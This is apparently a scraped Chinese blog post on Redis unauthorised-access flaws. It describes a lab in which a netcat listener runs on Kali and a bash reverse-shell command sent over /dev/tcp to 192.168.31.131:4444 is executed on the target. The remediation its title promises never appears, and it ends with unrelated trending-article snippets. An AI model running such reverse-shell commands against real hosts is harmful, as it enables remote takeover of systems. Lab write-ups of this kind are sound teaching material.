redis未授权漏洞及整改详细操作(redis未授权访问漏洞)
admin
2023-03-27 08:20:18

0x01 redis介绍

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。

话不多说直接开始做实验。

攻击机ip为192.168.31.91

由于docker的这个靶机没有crontab这个自动执行的文件,所以我们手动验证一下。

Kali 用nc -lvvp 4444进行监听。

靶机执行/bin/bash -i >& /dev/tcp/192.168.31.131/4444 0>&1

一执行就连接上了,现在我们在kali里执行一下命令试试看!

你看吧,任意执行shell命令!!

以上就是我服了网»redis未授权访问漏洞(redis未授权漏洞及整改详细操作)的相关内容了,更多精彩请关注我服了号公众号。

声明:本文由猫小编【创业者资源平台】作者编辑发布,更多技术关注猫小编技术!

相关内容

热门资讯

苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...